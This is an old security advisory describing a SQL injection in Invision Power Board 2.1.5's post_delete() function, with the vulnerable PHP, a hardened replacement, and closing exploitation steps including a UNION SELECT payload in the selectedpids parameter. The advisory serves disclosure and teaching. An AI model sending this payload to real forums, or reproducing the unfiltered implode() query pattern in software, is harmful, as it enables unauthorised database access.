Invision Power Board v2.1.5 Remote SQL Injection
Tuesday, 02 May 2006

Filename: func_mod.php
Function name: post_delete()
Lines: 89 to 209

Bug found by: Devil-00

Greetz:
Rock Master ^ Hackers Pal ^ n0m4rcy ^
www.securtygurus.net

[CODE]
// post_delete(): $id is taken from the selectedpids request parameter
if ( is_array( $id ) )
{
    if ( count($id) > 0 )
    {
        // Array elements are joined straight into the IN() list; no intval() is applied
        $pid = " IN(".implode(",",$id).")";
    }
    else
    {
        return FALSE;
    }
}
else
{
    if ( intval($id) )
    {
        // Single id: only this branch checks for an integer value
        $pid = "=$id";
    }
    else
    {
        return FALSE;
    }
}
[/CODE]

When $id is an array, the code never runs the elements through intval(); it only checks that the array is non-empty:

[CODE]
if ( count($id) > 0 )
{
    $pid = " IN(".implode(",",$id).")";
}
[/CODE]

The unfiltered $pid is then concatenated into the WHERE clause of this query, which allows SQL injection:

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => 'pid, topic_id', 'from' => 'posts', 'where' => 'pid'.$pid ) );
[/CODE]

And into this one:

[CODE]
$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'attachments', 'where' => 'attach_pid'.$pid ) );
[/CODE]
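The defect is that the array branch never coerces its elements. Below is an added example (not IPB's code) of how the $pid construction in post_delete() would look with every element forced through intval() and non-positive results dropped, so that only integer literals can reach either WHERE clause; build_pid_clause() and its sample inputs are constructed for this illustration.

```php
<?php
// Added example, not code from Invision Power Board: a hardened version of
// the $pid construction from post_delete(). Both the array and the scalar
// branch coerce the input to an integer before it is interpolated into SQL.
function build_pid_clause($id)
{
    if (is_array($id)) {
        // Coerce every element and drop anything that is not a valid post id.
        $ids = array_filter(array_map('intval', $id), function ($v) {
            return $v > 0;
        });
        if (count($ids) === 0) {
            return false;
        }
        // Only integers survive the filter, so the IN() list is safe to build.
        return " IN(" . implode(",", $ids) . ")";
    }

    // Scalar path: interpolate the coerced integer, never the raw input.
    $n = intval($id);
    return $n > 0 ? "=$n" : false;
}

// Constructed inputs: a legitimate pair of post ids, a selectedpids[] value
// containing non-numeric text, a single valid id and a single invalid id.
var_dump(build_pid_clause(array('12', '15')));
var_dump(build_pid_clause(array('-1) UNION SELECT 1,3/*')));
var_dump(build_pid_clause('7'));
var_dump(build_pid_clause('abc'));
```

The second call returns false because intval() reduces the non-numeric element to -1, which the filter rejects, so the delete routine bails out instead of issuing the query.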

Because the two queries select a different number of columns, a single UNION payload cannot be lined up against both tables at once, which makes exploitation awkward.

Example:

1- First add 2 posts
2- Select them for deletion
3- Edit the query string with HTTPLiveHeader

[CODE]
act=mod&auth_key=2b71da21cbacba35ccf6fc04fe807d9a&st=0&selectedpids=-1) UNION SELECT 1,3/*&tact=delete
[/CODE]